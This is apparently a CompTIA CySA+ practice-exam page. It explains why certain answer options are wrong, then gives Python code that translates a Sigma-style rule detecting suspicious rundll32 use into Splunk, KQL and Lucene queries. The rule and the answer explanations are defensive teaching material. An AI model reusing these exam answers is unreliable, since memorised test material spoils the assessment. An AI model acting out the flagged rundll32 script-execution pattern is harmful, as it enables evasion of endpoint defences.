Option A is wrong because a CVSS vector string is a standardized description of vulnerability severity (e.g., CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H), not a detection artefact for identifying suspicious process execution like rundll32; it describes risk, not a pattern to match in logs. Option C is wrong because YARA rules are designed for pattern matching on files and memory (e.g., identifying malware binaries by byte sequences or strings), not for querying Windows event logs or SIEM log streams; YARA is not natively portable to SIEM platforms for log-based detection. Option D is wrong because OpenIOC is an XML format for describing indicators (hashes, paths, registry keys), not log-query logic, and "only" rules out converting it into anything else.
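Worked example, added here and not part of the original question set: the portability the answer relies on, shown by rendering one Sigma-style rundll32 rule into three query dialects. The rule is written for this example (its ideas mirror common public rules, but it is not a copy of a specific SigmaHQ rule). The field mappings are assumptions about three typical targets: Splunk with Sysmon field names, Microsoft Defender/Sentinel KQL on DeviceProcessEvents, and Elastic ECS fields queried with Lucene syntax. In production, sigma-cli and the pySigma backends do this job with full condition grammar; this shows the mechanics.

```python
# Sigma rule for suspicious rundll32 use, as the dict form of its YAML (constructed for this example).
RUNDLL32_RULE = {
    "title": "rundll32 run with script or user-writable path in its arguments",
    "logsource": {"category": "process_creation", "product": "windows"},
    "detection": {
        "selection": {"Image|endswith": "\\rundll32.exe"},
        "susp_args": {"CommandLine|contains": ["javascript:", "\\Temp\\", "\\AppData\\", "\\Users\\Public\\"]},
        "condition": "selection and susp_args",
    },
}

def _backslash(s: str) -> str:
    return s.replace("\\", "\\\\")

# Per-target rendering: field-name mapping, operator templates, boolean keywords, prefix, escaping.
BACKENDS = {
    "splunk": {
        "fields": {},
        "ops": {"": '{f}="{v}"', "contains": '{f}="*{v}*"', "endswith": '{f}="*{v}"', "startswith": '{f}="{v}*"'},
        "kw": {"and": "AND", "or": "OR", "not": "NOT"},
        "prefix": "",
        "escape": _backslash,
    },
    "kql": {
        "fields": {"Image": "FolderPath", "CommandLine": "ProcessCommandLine"},
        "ops": {"": '{f} =~ "{v}"', "contains": '{f} contains "{v}"',
                "endswith": '{f} endswith "{v}"', "startswith": '{f} startswith "{v}"'},
        "kw": {"and": "and", "or": "or", "not": "not"},
        "prefix": "DeviceProcessEvents | where ",
        "escape": _backslash,
    },
    "lucene": {
        "fields": {"Image": "process.executable", "CommandLine": "process.command_line"},
        "ops": {"": '{f}:"{v}"', "contains": "{f}:*{v}*", "endswith": "{f}:*{v}", "startswith": "{f}:{v}*"},
        "kw": {"and": "AND", "or": "OR", "not": "NOT"},
        "prefix": "",
        "escape": lambda s: _backslash(s).replace(":", "\\:"),
    },
}

def render_selection(selection: dict, backend: str) -> str:
    """Fields within a selection are ANDed; a list of values for one field is ORed."""
    b = BACKENDS[backend]
    clauses = []
    for spec, values in selection.items():
        field, _, modifier = spec.partition("|")
        if modifier not in b["ops"]:
            raise ValueError(f"modifier '{modifier}' not supported by this translator")
        f = b["fields"].get(field, field)
        vals = values if isinstance(values, list) else [values]
        terms = [b["ops"][modifier].format(f=f, v=b["escape"](str(v))) for v in vals]
        clause = f" {b['kw']['or']} ".join(terms)
        clauses.append(f"({clause})" if len(terms) > 1 else clause)
    return f" {b['kw']['and']} ".join(clauses)

def translate(rule: dict, backend: str) -> str:
    """Render the rule's condition for one backend. Handles and/or/not between named selections,
    left to right; parentheses and the '1 of'/'all of' forms are left to a real converter."""
    b = BACKENDS[backend]
    det = rule["detection"]
    out = []
    for tok in det["condition"].split():
        if tok in b["kw"]:
            out.append(b["kw"][tok])
        else:
            rendered = render_selection(det[tok], backend)
            out.append(f"({rendered})" if len(det[tok]) > 1 else rendered)
    return b["prefix"] + " ".join(out)

def translate_all(rule: dict) -> dict:
    return {name: translate(rule, name) for name in BACKENDS}

if __name__ == "__main__":
    for name, query in translate_all(RUNDLL32_RULE).items():
        print(f"[{name}] {query}")
```

The same detection logic produces three different query strings, and only the field names and quoting changed; that is the portability argument for choosing Sigma over a vendor-specific saved search.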

CompTIA CySA+ CS0-003 CS0-003 Questions 826–900 | Page 12/14 | Courseiva